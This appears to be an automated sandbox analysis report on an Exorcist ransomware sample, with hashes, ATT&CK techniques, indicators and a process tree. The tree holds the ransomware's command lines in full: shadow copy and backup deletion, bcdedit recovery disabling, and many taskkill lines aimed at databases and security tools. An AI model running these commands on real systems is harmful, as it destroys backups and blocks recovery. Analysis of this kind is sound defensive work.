exorcist | 6db3aae21a6d80857c85f58c4c8b2cf9c6b7f8b8a9ab1d5496d18eaf9bd0bd01

Analysis

max time kernel
146s
max time network
85s
platform
windows7_x64
resource
win7v200722
submitted
24-07-2020 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4009abe9f41da41e48340c96e29d62c.exe
Size

43KB
MD5

f4009abe9f41da41e48340c96e29d62c
SHA1

01636cd2ab7eada533ded51728acd8cd99020c57
SHA256

6db3aae21a6d80857c85f58c4c8b2cf9c6b7f8b8a9ab1d5496d18eaf9bd0bd01
SHA512

4bdd711818c29c01dd532c13c23155ee0450a7f1f3ad7d92c45952f59b8ee947ab5876688e8971dfd094f7f494003106e9ad9b470cf99bccbd53f545900c9a15

Score

10^/10

ransomware persistence exorcist

Malware Config

Signatures

Suspicious use of AdjustPrivilegeToken 127 IoCs

Processes:

WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: SeBackupPrivilege	1772	vssvc.exe
Token: SeRestorePrivilege	1772	vssvc.exe
Token: SeAuditPrivilege	1772	vssvc.exe
Token: SeDebugPrivilege	1376	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	788	taskkill.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	1852	taskkill.exe
Token: SeDebugPrivilege	1912	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1888	taskkill.exe
Token: SeDebugPrivilege	760	taskkill.exe
Token: SeDebugPrivilege	564	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Modifies extensions of user files 14 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

f4009abe9f41da41e48340c96e29d62c.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DenyApprove.png => C:\Users\Admin\Pictures\DenyApprove.png.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\UninstallConnect.tif => C:\Users\Admin\Pictures\UninstallConnect.tif.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\UseRedo.tif.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteRedo.png.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\CompressNew.raw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\DenyApprove.png.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\CompleteRedo.png => C:\Users\Admin\Pictures\CompleteRedo.png.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\SetResize.raw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\UninstallConnect.tif.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\UseRedo.tif => C:\Users\Admin\Pictures\UseRedo.tif.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\CompressNew.raw => C:\Users\Admin\Pictures\CompressNew.raw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\InstallUnblock.crw => C:\Users\Admin\Pictures\InstallUnblock.crw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\Pictures\InstallUnblock.crw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe
File renamed	C:\Users\Admin\Pictures\SetResize.raw => C:\Users\Admin\Pictures\SetResize.raw.cFTjfU	f4009abe9f41da41e48340c96e29d62c.exe

Suspicious behavior: EnumeratesProcesses 376 IoCs

Processes:

f4009abe9f41da41e48340c96e29d62c.exe

pid	process
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe
844	f4009abe9f41da41e48340c96e29d62c.exe

NTFS ADS 5 IoCs

Processes:

f4009abe9f41da41e48340c96e29d62c.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:niouzersmbbef	f4009abe9f41da41e48340c96e29d62c.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:ruwvvoech	f4009abe9f41da41e48340c96e29d62c.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:crecqyosmlwneafy	f4009abe9f41da41e48340c96e29d62c.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ruwvvoech	f4009abe9f41da41e48340c96e29d62c.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:colmipagylghfdlek	f4009abe9f41da41e48340c96e29d62c.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

f4009abe9f41da41e48340c96e29d62c.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	f4009abe9f41da41e48340c96e29d62c.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1804 vssadmin.exe

pid	process
1804	vssadmin.exe

Kills process with taskkill 87 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2012	taskkill.exe
876	taskkill.exe
1808	taskkill.exe
772	taskkill.exe
1808	taskkill.exe
1500	taskkill.exe
1868	taskkill.exe
772	taskkill.exe
1000	taskkill.exe
564	taskkill.exe
788	taskkill.exe
2016	taskkill.exe
1344	taskkill.exe
1036	taskkill.exe
1492	taskkill.exe
800	taskkill.exe
1616	taskkill.exe
760	taskkill.exe
2020	taskkill.exe
1872	taskkill.exe
1984	taskkill.exe
1556	taskkill.exe
1904	taskkill.exe
1552	taskkill.exe
572	taskkill.exe
1940	taskkill.exe
1852	taskkill.exe
744	taskkill.exe
1364	taskkill.exe
340	taskkill.exe
1056	taskkill.exe
520	taskkill.exe
1060	taskkill.exe
788	taskkill.exe
1496	taskkill.exe
1952	taskkill.exe
2040	taskkill.exe
1432	taskkill.exe
1832	taskkill.exe
1912	taskkill.exe
1232	taskkill.exe
1052	taskkill.exe
1904	taskkill.exe
1944	taskkill.exe
1604	taskkill.exe
876	taskkill.exe
1980	taskkill.exe
1824	taskkill.exe
1956	taskkill.exe
660	taskkill.exe
1368	taskkill.exe
2032	taskkill.exe
2000	taskkill.exe
1892	taskkill.exe
580	taskkill.exe
1524	taskkill.exe
1044	taskkill.exe
772	taskkill.exe
1060	taskkill.exe
1820	taskkill.exe
1320	taskkill.exe
744	taskkill.exe
1400	taskkill.exe
1940	taskkill.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1432 timeout.exe

pid	process
1432	timeout.exe

Suspicious use of WriteProcessMemory 740 IoCs

Processes:

f4009abe9f41da41e48340c96e29d62c.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 844 wrote to memory of 744	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 744	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 744	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 744	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 744 wrote to memory of 1628	744	cmd.exe	WMIC.exe
PID 744 wrote to memory of 1628	744	cmd.exe	WMIC.exe
PID 744 wrote to memory of 1628	744	cmd.exe	WMIC.exe
PID 744 wrote to memory of 1628	744	cmd.exe	WMIC.exe
PID 844 wrote to memory of 1244	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1244	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1244	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1244	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1852	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1852	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1852	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1852	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1876	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1876	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1876	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1876	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1736	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1736	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1736	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1736	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1808	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1808	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1808	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1808	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 1808 wrote to memory of 1804	1808	cmd.exe	vssadmin.exe
PID 1808 wrote to memory of 1804	1808	cmd.exe	vssadmin.exe
PID 1808 wrote to memory of 1804	1808	cmd.exe	vssadmin.exe
PID 1808 wrote to memory of 1804	1808	cmd.exe	vssadmin.exe
PID 844 wrote to memory of 580	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 580	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 580	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 580	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1368	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1368	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1368	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1368	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 1368 wrote to memory of 1376	1368	cmd.exe	taskkill.exe
PID 1368 wrote to memory of 1376	1368	cmd.exe	taskkill.exe
PID 1368 wrote to memory of 1376	1368	cmd.exe	taskkill.exe
PID 1368 wrote to memory of 1376	1368	cmd.exe	taskkill.exe
PID 844 wrote to memory of 1632	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1632	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1632	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1632	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 1632 wrote to memory of 1556	1632	cmd.exe	taskkill.exe
PID 1632 wrote to memory of 1556	1632	cmd.exe	taskkill.exe
PID 1632 wrote to memory of 1556	1632	cmd.exe	taskkill.exe
PID 1632 wrote to memory of 1556	1632	cmd.exe	taskkill.exe
PID 844 wrote to memory of 1988	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1988	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1988	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 1988	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 1988 wrote to memory of 1940	1988	cmd.exe	taskkill.exe
PID 1988 wrote to memory of 1940	1988	cmd.exe	taskkill.exe
PID 1988 wrote to memory of 1940	1988	cmd.exe	taskkill.exe
PID 1988 wrote to memory of 1940	1988	cmd.exe	taskkill.exe
PID 844 wrote to memory of 2028	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 2028	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 2028	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe
PID 844 wrote to memory of 2028	844	f4009abe9f41da41e48340c96e29d62c.exe	cmd.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1388 cmd.exe
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
1388	cmd.exe

C:\Users\Admin\AppData\Local\Temp\f4009abe9f41da41e48340c96e29d62c.exe
"C:\Users\Admin\AppData\Local\Temp\f4009abe9f41da41e48340c96e29d62c.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- NTFS ADS
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\SysWOW64\cmd.exe
cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
2⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic.exe SHADOWCOPY DELETE /nointeractive
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Windows\SysWOW64\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
2⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
2⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /C bcdedit.exe /set {default} recoveryenabled No
2⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
PID:1736

C:\Windows\SysWOW64\cmd.exe
cmd /C vssadmin.exe Delete Shadows /All /Quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1808

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1804

C:\Windows\SysWOW64\cmd.exe
cmd /C C:\Windows\system32\vssvc.exe
2⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM wxServer*
2⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM wxServer*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM wxServerView*
2⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM wxServerView*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM sqlmangr*
2⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM sqlmangr*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1940

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM RAgui*
2⤵
PID:2028

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM RAgui*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM supervise*
2⤵
PID:1512

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM supervise*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Culture*
2⤵
PID:1500

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Culture*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:788

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Defwatch*
2⤵
PID:1424

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Defwatch*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:836

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM winword*
2⤵
PID:1112

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM winword*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1852

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBW32*
2⤵
PID:1908

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBW32*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1912

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgr*
2⤵
PID:468

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBDBMgr*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1808

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM qbupdate*
2⤵
PID:1360

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM qbupdate*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:772

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM axlbridge*
2⤵
PID:1644

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM axlbridge*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM httpd*
2⤵
PID:1980

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM httpd*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM fdlauncher*
2⤵
PID:2016

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM fdlauncher*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM MsDtSrvr*
2⤵
PID:1460

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM MsDtSrvr*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1000

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM java*
2⤵
PID:1560

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM java*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:800

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM 360se*
2⤵
PID:1052

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM 360se*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM 360doctor*
2⤵
PID:1044

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM 360doctor*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM wdswfsafe*
2⤵
PID:1868

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM wdswfsafe*
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM fdhost*
2⤵
PID:1908

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM fdhost*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:564

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM GDscan*
2⤵
PID:1900

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM GDscan*
3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1368

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM ZhuDongFangYu*
2⤵
PID:1652

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM ZhuDongFangYu*
3⤵
- Kills process with taskkill
PID:1616

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM QBDBMgrN*
2⤵
PID:1984

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM QBDBMgrN*
3⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM mysqld*
2⤵
PID:1980

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM mysqld*
3⤵
- Kills process with taskkill
PID:2032

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM AutodeskDesktopApp*
2⤵
PID:676

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM AutodeskDesktopApp*
3⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM acwebbrowser*
2⤵
PID:1476

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM acwebbrowser*
3⤵
- Kills process with taskkill
PID:1496

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Creative Cloud*
2⤵
PID:1540

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Creative Cloud*
3⤵
- Kills process with taskkill
PID:744

C:\Windows\SysWOW64\cmd.exe
cmd /C taskkill /F /T /IM Adobe Desktop Service*
2⤵
PID:1108

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /T /IM Adobe Desktop Service*
3⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
